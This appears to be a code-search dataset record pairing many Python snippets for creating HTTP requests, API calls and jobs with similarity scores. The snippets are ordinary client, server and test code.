[ "def request_factory(self) -> 'JSONRPCRequest':\n return JSONRPCRequest()", "def post(self):\n data, errors = JobSchema().loads(request.data)\n\n if errors:\n return Response().send(\n data=None, status=400, code=\"bad_request\", message=errors\n )\n return self.job.create(request.json)", "def create_request(self, config):\n self.logger.info(\"Injecting request args:\\n%s ...\", config.request_args[\"createRequest\"])\n json_args = json.dumps(config.request_args[\"createRequest\"])\n urn = self.urn_prefix + \"/request\"\n status, data = self.http_request(\"POST\", urn, data=json_args,\n headers=self.headersBody)\n if status > 216:\n self.logger.error(\"Failed to create request with status: %s, data: %s\", status, data)\n sys.exit(1)\n data = json.loads(data)\n self.logger.info(data)\n request_name = data[\"result\"][0][\"request\"]\n self.approve_request(request_name)\n self.logger.info(\"Create request '%s' succeeded.\", request_name)\n\n config.request_names = request_name\n\n return request_name", "def _GenHttpRequestProto(self):\n request = jobs_pb2.HttpRequest()\n request.source_ip = \"127.0.0.1\"\n request.user_agent = \"Firefox or something\"\n request.url = \"http://test.com/test?omg=11%45x%20%20\"\n request.user = \"anonymous\"\n request.timestamp = int(time.time() * 1e6)\n request.size = 1000\n return request", "async def create_job(response: Response,\n request: Request,\n job: Job = Body(\n ...,\n example={\n \"id_video\": \"bbb_0.mp4\",\n \"bitrate\": 7000,\n \"speed\": \"ultrafast\",\n },\n )\n ): \n \n\n # get an ID and return to client\n id_job = mngr.getID()\n logger.debug(\"got id_job %s\" %id_job)\n resp = [\"http:/\"]\n resp.append(request.headers['host'])\n resp.append(id_job)\n response.headers[\"Location\"] = \"/\".join(resp)\n\n # create the task\n mngr.newJob(id_job, \n job.id_video, \n job.bitrate, \n job.speed)\n\n return id_job", "def create(self, resource, **data):\n body = ''\n if resource == 'robot/job':\n body = data['body']\n else:\n body = urllib.urlencode(data)\n\n return self.request('/' + resource, 'POST', body=body)", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def __init__(self, message, *args, **kwargs):\n Job.Service.__init__(self, *args, **kwargs)\n self.message = message", "def new_request(self, **kwargs):\n url = self.config[\"base_url\"]\n\n if kwargs.get(\"user_id\") is not None:\n url = url + kwargs[\"user_id\"]\n\n self.req = request.Request(host=self.config[\"host\"], protocol=constant.HTTP, url=url,\n method=kwargs[\"method\"], time_out=kwargs[\"timeout\"])\n\n return self", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Create(self, request, global_params=None):\n config = self.GetMethodConfig('Create')\n return self._RunMethod(\n config, request, global_params=global_params)", "def test_create_namespaced_build_request_instantiate(self):\n pass", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def jobserver_job():\n return _MakeJob()", "def _make_request(self, payload, headers=None):\n pathparts = REQ_PATH.split(b\"/\")\n if pathparts[0] == b\"\":\n pathparts = pathparts[1:]\n dreq = DummyRequest(pathparts)\n dreq.requestHeaders = Headers(headers or {})\n dreq.responseCode = 200 # default to 200\n\n if isinstance(payload, dict):\n payload = json.dumps(payload)\n\n dreq.content = BytesIO(payload.encode())\n dreq.method = \"POST\"\n\n return dreq", "def create_job(api_instance, job):\n api_response = api_instance.create_namespaced_job(\n body=job, namespace=\"default\", pretty=True\n )\n logger.info(\"Job created with status='%s'\" % str(api_response.status))\n return api_response", "def create_request(params={}, path='/', method='POST'):\n request = DummyRequest(path)\n request.method = method\n request.args = params\n return request", "def created_job(new_job, bulk_request):\n bulk_request.return_value = '''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <id>THEJOBID</id>\n <operation>update</operation>\n <object>Lead</object>\n </jobInfo>\n '''\n new_job.create()\n return new_job", "def create_command_from_request(request: RequestInterface):", "def make_work_request(self):\n request = StoreRequest()\n self.bb_client.read_wait(request, self.handle_request)", "def create_custom_job(\n type,\n project,\n location,\n payload,\n gcp_resources,\n):\n remote_runner = job_remote_runner.JobRemoteRunner(\n type, project, location, gcp_resources\n )\n\n try:\n # Create custom job if it does not exist\n job_name = remote_runner.check_if_job_exists()\n if job_name is None:\n job_name = remote_runner.create_job(\n create_custom_job_with_client,\n insert_system_labels_into_payload(payload),\n )\n\n # Poll custom job status until \"JobState.JOB_STATE_SUCCEEDED\"\n remote_runner.poll_job(get_custom_job_with_client, job_name)\n except (ConnectionError, RuntimeError) as err:\n error_util.exit_with_internal_error(err.args[0])", "def req():\n return Request()", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def make_request(self, environ, **kwargs):\n factory = self.get(abcs.ARequest)\n request = factory(environ, self, **kwargs)\n self._set_request_attributes(request)\n return request", "def _CreateRequest(self, url, data=None):\r\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\r\n req = urllib2.Request(url, data=data, headers={\"Accept\": \"text/plain\"})\r\n if self.host_override:\r\n req.add_header(\"Host\", self.host_override)\r\n for key, value in self.extra_headers.iteritems():\r\n req.add_header(key, value)\r\n return req", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def create(cls, request):\n if isinstance(request, Request):\n request = request.prepare()\n\n # Method\n method = request.method.lower()\n\n # Cookies\n cookie = {}\n if request._cookies is not None:\n # cookies are stored in a cookiejar object\n cookie = request._cookies.get_dict()\n\n # Preparing a request formats the URL with params, strip them out again\n o = urlparse(request.url)\n params = parse_qs(o.query)\n # extract the URL without query parameters\n url = o._replace(query=None).geturl()\n\n # Order matters because all python requests issued from a session\n # include Accept */* which does not necessarily match the content type\n mimetype = request.headers.get(\"Content-Type\") or request.headers.get(\n \"Accept\"\n )\n\n # Headers - request.headers is not an instance of Headers\n # which is expected\n header = Headers(dict(request.headers))\n\n # Body\n # TODO: figure out if request._body_position is relevant\n body = request.body\n\n # Path gets deduced by path finder against spec\n parameters = RequestParameters(\n query=ImmutableMultiDict(params),\n header=header,\n cookie=cookie,\n )\n return OpenAPIRequest(\n full_url_pattern=url,\n method=method,\n parameters=parameters,\n body=body,\n mimetype=mimetype,\n )", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def create(self, obj):\r\n request = http.Request('POST', self.get_url(), self.wrap_object(obj))\r\n\r\n return request, parsers.parse_json", "def _CreateRequest(self, url, data=None):\n logging.debug(\"Creating request for: '%s' with payload:\\n%s\", url, data)\n req = urllib2.Request(url, data=data)\n if self.host_override:\n req.add_header(\"Host\", self.host_override)\n for key, value in self.extra_headers.iteritems():\n req.add_header(key, value)\n return req", "def create(self, **kwargs):\n url_str = self.base_url\n newheaders = self.get_headers()\n payload = kwargs['definition']\n resp, body = self.client.json_request('POST', url_str,\n data=payload,\n headers=newheaders)\n return resp", "def create_request(url, headers, attempts, request_type, data=None):\n request_func = getattr(requests, request_type)\n kwargs = {\"url\": url, \"headers\": headers}\n if request_type == \"post\" or request_type == \"patch\":\n kwargs[\"json\"] = data\n try:\n req = request_func(**kwargs)\n status_code = req.status_code\n time.sleep(1)\n while status_code >= 400 and attempts < 5:\n req = request_func(**kwargs)\n status_code = req.status_code\n attempts += 1\n time.sleep(1)\n return req\n except Exception as e:\n print(\"[ERROR] There was an error with the request, details:\")\n print(e)\n return None", "def create_request(v1):\n #get entered data\n data = request.get_json()\n\n #picking the request attributes\n req_title = data.get(\"request_title\")\n req_desc = data.get(\"request_description\")\n requester_name = \"Gideon\"\n req_id = len(all_requests) +1 # + random.randint(1, 3000)\n\n #validation\n if not req_title:\n return jsonify({\"message\": \"Request has no title\"}), 400\n if not req_desc:\n return jsonify({\"message\": \"Request has no description\"}), 400\n if not requester_name:\n return jsonify({\"message\": \"Request must be issued by a user\"}), 400\n if not req_id:\n return jsonify({\"message\": \"Request has no id\"}), 400\n\n #storing entered request\n new_request = MaintenanceRequest(req_title, req_desc, requester_name, req_id)\n all_requests.append(new_request)\n # new_number_of_requests = len(all_requests)\n\n return jsonify({\n \"message\":\"sucessfully created request\",\n 'request_title':new_request.title,\n \"request_description\":new_request.description,\n \"requester_name\" : new_request.requester_name,\n \"request_id\" : new_request.request_id\n })", "def _prepare_create_request(instance):\n parent_name = ('projects/' + instance._client.project)\n message = messages_v2_pb2.CreateInstanceRequest(\n parent=parent_name,\n instance_id=instance.instance_id,\n instance=data_v2_pb2.Instance(\n display_name=instance.display_name,\n ),\n )\n cluster = message.clusters[instance.instance_id]\n cluster.name = instance.name + '/clusters/' + instance.instance_id\n cluster.location = (\n parent_name + '/locations/' + instance._cluster_location_id)\n cluster.serve_nodes = instance._cluster_serve_nodes\n return message", "def send_job(self):\n graph = self.processgraphEdit.toPlainText()\n # info(self.iface, graph)\n response = self.connection.job_create(json.loads(graph))\n if response.status_code == 201:\n info(self.iface, \"Successfully created new job, Response: {}\".format(response.status_code))\n else:\n warning(self.iface, \"Not able to created new job, Response: {}\".format(str(response.json())))", "def newRequest(self):\n return Request( )", "def create_request(self):\n try:\n stock_name, request = self.text.split(\" \")\n print(stock_name)\n print(request)\n if request in run_commands.keys():\n endpoint: str = run_commands.get(request).get('endpoint')\n url_maker: str = f\"stocks/{stock_name}{endpoint}\"\n print(url_maker)\n response: Optional[str, Dict[str, str]] = self.make_request(method=\"GET\", endpoint=url_maker)\n if isinstance(response, dict):\n print(response)\n api_response: Dict[str, str] = slack_response.stock_info(stock_name, response.get(\"message\"))\n print(api_response)\n return api_response\n else:\n return \"release in progress\"\n except ValueError as e:\n return slack_response.help_response()\n except KeyError as e:\n return slack_response.help_response()", "def _request(self, *args, **kwargs):\n request = self._make_request(*args, **kwargs)\n\n return self._collect_request(request)", "def create_namespaced_build_request_instantiate(self, body, namespace, name, **kwargs):\n\n all_params = ['body', 'namespace', 'name', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method create_namespaced_build_request_instantiate\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `create_namespaced_build_request_instantiate`\")\n # verify the required parameter 'namespace' is set\n if ('namespace' not in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `create_namespaced_build_request_instantiate`\")\n # verify the required parameter 'name' is set\n if ('name' not in params) or (params['name'] is None):\n raise ValueError(\"Missing the required parameter `name` when calling `create_namespaced_build_request_instantiate`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/buildconfigs/{name}/instantiate'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n if 'name' in params:\n path_params['name'] = params['name']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1BuildRequest',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def CreateModel(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def _request(self, method, url, payload=None, **params):\n kwargs = dict(params=params)\n kwargs[\"timeout\"] = self._timeout\n if not url.startswith('http'):\n url = self.prefix + url\n headers = self._auth_headers()\n headers['Content-Type'] = 'application/json'\n\n if payload:\n kwargs[\"data\"] = json.dumps(payload)\n gs = self._gpool.spawn if self._gpool else gevent.spawn\n r = gs(self.session.request, method, url, headers=headers, **kwargs)\n r.fetch = partial(self.join, r)\n update_wrapper(r.fetch, self.join)\n #gevent.sleep(0.05)\n return r", "def create_job_object(message, environment_image):\n\n PYTHONUNBUFFERED_ENV = client.V1EnvVar(name=\"PYTHONUNBUFFERED\", value=\"1\")\n AUTH_TOKEN_ENV = client.V1EnvVar(name=\"AUTH_TOKEN\", value=AUTH_TOKEN)\n EVALAI_API_SERVER_ENV = client.V1EnvVar(\n name=\"EVALAI_API_SERVER\", value=EVALAI_API_SERVER\n )\n MESSAGE_BODY_ENV = client.V1EnvVar(name=\"BODY\", value=json.dumps(message))\n submission_pk = message[\"submission_pk\"]\n image = message[\"submitted_image_uri\"]\n # Configureate Pod agent container\n agent_container = client.V1Container(\n name=\"agent\", image=image, env=[PYTHONUNBUFFERED_ENV]\n )\n # Configureate Pod environment container\n environment_container = client.V1Container(\n name=\"environment\",\n image=environment_image,\n env=[\n PYTHONUNBUFFERED_ENV,\n AUTH_TOKEN_ENV,\n EVALAI_API_SERVER_ENV,\n MESSAGE_BODY_ENV,\n ],\n resources=client.V1ResourceRequirements(\n limits={\"nvidia.com/gpu\": \"1\"}\n ),\n )\n # Create and configurate a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(labels={\"app\": \"evaluation\"}),\n spec=client.V1PodSpec(\n containers=[environment_container, agent_container],\n restart_policy=\"Never\",\n ),\n )\n # Create the specification of deployment\n spec = client.V1JobSpec(backoff_limit=1, template=template)\n # Instantiate the job object\n job = client.V1Job(\n api_version=\"batch/v1\",\n kind=\"Job\",\n metadata=client.V1ObjectMeta(\n name=\"submission-{0}\".format(submission_pk)\n ),\n spec=spec,\n )\n return job" ]
[ "0.65077955", "0.6448152", "0.64046395", "0.63458514", "0.6320473", "0.63068354", "0.628952", "0.62621844", "0.6166124", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.61317235", "0.6055981", "0.6033738", "0.59726167", "0.595618", "0.59204197", "0.5915558", "0.5879287", "0.5858012", "0.58424234", "0.58366823", "0.58345455", "0.58292747", "0.58204967", "0.58197796", "0.5815004", "0.580783", "0.57937104", "0.5769609", "0.5765096", "0.57418543", "0.5740205", "0.5738704", "0.5732825", "0.5723584", "0.57131755", "0.5709354", "0.56958896", "0.5681903", "0.5673356", "0.566901", "0.5666869" ]
0.0
-1
Returns a function to decide if log fetcher should continue polling.
def CheckJobComplete(self, name): request = self.messages.AiplatformProjectsLocationsCustomJobsGetRequest( name=name) response = self._service.Get(request) def ShouldContinue(periods_without_logs): if periods_without_logs <= 1: return True return response.endTime is None return ShouldContinue
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _do_request(self):\n\n if time.time() < self._next_request:\n return False\n else:\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\r\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def should_poll(self):\n return False", "def poll(self):\n return False", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self):\n return self.notifier.socket is not None", "def should_poll(self):\n return self._should_poll", "def issuer_liveness_check():\n global app_config\n\n if app_config[\"running\"]:\n # return True until we get a shutdown request\n return True\n\n # return True until the work queue is cleared\n return tob_connection_active()", "def check_status(self):\n log = logging.getLogger(\"%s.%s\" % (self.log_name,\n inspect.stack()[0][3]))\n log.setLevel(self.log_level)\n\n if self.url:\n return True\n try:\n result = requests.get(self.ext_url)\n self.url = self.ext_url\n return True\n except requests.exceptions.ConnectionError:\n pass\n try:\n result = requests.get(self.local_url)\n log.warning(\"Url '%s' not connecting. Using local_url '%s'\" % \\\n (self.ext_url, self.local_url))\n self.url = self.local_url\n return True\n except requests.exceptions.ConnectionError:\n self.url = None\n log.warning(\"Unable to connect using urls: %s\" % set([self.ext_url,\n self.local_url]))\n return False", "def is_polling_done(self):\n if self.message_request_more:\n return False\n \n if self.message_cache:\n return False\n \n return True", "def is_call_waiting(self) -> bool:", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "def should_progress(self,\n\t\t\tperiod=constants.POLLING_BOOTSTRAP_PERIOD,\n\t\t\tnow=datetime.datetime.utcnow):\n\t\tnow_time = now()\n\t\tif self.next_start < now_time:\n\t\t\tlogging.info('Polling starting afresh for start time %s', self.next_start)\n\t\t\tself.last_start = self.next_start\n\t\t\tself.next_start = now_time + datetime.timedelta(seconds=period)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False", "def is_poll(self):\n return self.subscription_list.mode == gnmi_pb2.SubscriptionList.POLL", "def nanny(self): \n while not self.started and not self.failed:\n eventlet.sleep(.1)\n return not self.failed", "def monitor(self, target):\n while self.RUNNING:\n check_time = datetime.now()\n next_check = check_time + timedelta(seconds=target[\"frequency\"])\n\n try:\n self.produce(\n get(target[\"url\"], timeout=target[\"frequency\"] - 0.5),\n target.get(\"regex\"),\n check_time,\n )\n except Timeout:\n self.logger.warning(\"Check for %s timed out\", target[\"url\"])\n except RequestException as e:\n self.logger.error(e)\n except re.error as e:\n self.logger.error(e)\n break\n\n # Busy loop until next check_time\n while datetime.now() < next_check:\n sleep(1)", "def precheck(self):\n # making sure it's a time for pull, otherwise just sleep\n if datetime.now() < self.startTime + timedelta(hours=int(self.newsFrequency)):\n logging.info(\"Didn't reach time to wakeup yet, going to sleep\")\n self.sleep()", "def check_for_lock_request(self):\n while True:\n sleep(0.1)\n if self.get_state():\n sleep(5)\n self.lock()\n break", "def IsStarted(self):\n for _ in range(5):\n if self.proxy_process.poll() is not None:\n # The process has exited.\n break\n try:\n up_url = '%s://localhost:%s/web-page-replay-generate-200'\n http_up_url = up_url % ('http', HTTP_PORT)\n https_up_url = up_url % ('https', HTTPS_PORT)\n if (200 == urllib.urlopen(http_up_url, None, {}).getcode() and\n 200 == urllib.urlopen(https_up_url, None, {}).getcode()):\n return True\n except IOError:\n time.sleep(1)\n return False", "def check_heartbeat(self):\n try:\n req = request(self.values['url'].data)\n response = urllib.urlopen(req)\n the_page = response.read()\n return True\n except urllib.HTTPError as e:\n if e.code == 400:\n return True\n else:\n logger.exception('[%s] - Exception when checking heartbeat')\n return False\n except Exception:\n logger.exception('[%s] - Exception when checking heartbeat')\n return False", "def toggle_polling(self):\n self.polling = not self.polling\n if not self.polling:\n # print('In toggle polling')\n self._stop_loop_feedback()\n self._start_loop_poll() if self.polling else self._stop_loop_poll()", "def is_async(self) -> bool:", "def _running_locally(coreapi_url, jobs_api_url):\n return not (coreapi_url and jobs_api_url)", "def should_poll(self):\n return self._command_state is not None", "def should_refresh_client_fnc(response):\n return not response", "def log_curl(self) -> bool:\n return self._log_curl", "def poll(self):\r\n if self.channel.is_available():\r\n self.serve()\r\n return True\r\n else:\r\n return False", "def log_once(key):\r\n\r\n global _last_logged\r\n\r\n if _disabled:\r\n return False\r\n elif key not in _logged:\r\n _logged.add(key)\r\n _last_logged = time.time()\r\n return True\r\n elif _periodic_log and time.time() - _last_logged > 60.0:\r\n _logged.clear()\r\n _last_logged = time.time()\r\n return False\r\n else:\r\n return False", "def _server_poll_expcompleted_(self):\n #print \"class Princeton_CCD function _server_poll_expcompleted_\" \n try:\n last_state = self.polled_running\n except (AttributeError,UnboundLocalError):\n self.polled_running = False\n last_state = False\n self.polled_running = self.query_running()\n if (not bool(last_state) and bool(self.polled_running)):\n self.begin_acq_time = time.time()\n #print self.query_running(), last_state\n #if ((last_state == True) and (self.polled_running == False)): CP\n if (bool(last_state) and not bool(self.polled_running)):\n self.end_acq_time = time.time()\n return True\n else:\n return False", "def poll(self):\n self.poll_function(self.connection)", "def should_sleep(self):\n return", "def needs_update(self, tweet_request: Request, refresh_rate: float = None) -> bool:\n if self.SOFT_RELOAD:\n if refresh_rate is None:\n refresh_rate = self.REFRESH_RATE\n filename = self.request_filename(tweet_request=tweet_request)\n if os.path.isfile(filename):\n stamp = os.path.getmtime(filename=filename)\n now = datetime.now().timestamp()\n if now - stamp > refresh_rate:\n return True\n else:\n return True\n return False", "def _can_ping_url(self, url, headers):\n try:\n self.http_request(url, \"GET\", \"\", headers, timeout=.75)\n return True\n except:\n return False", "def always_retry(e):\n return True", "def poll(self):\n now = time.time()\n if now > self._next_beat_t:\n self._next_beat_t = now + 60\n self.set_driver('ST', now, 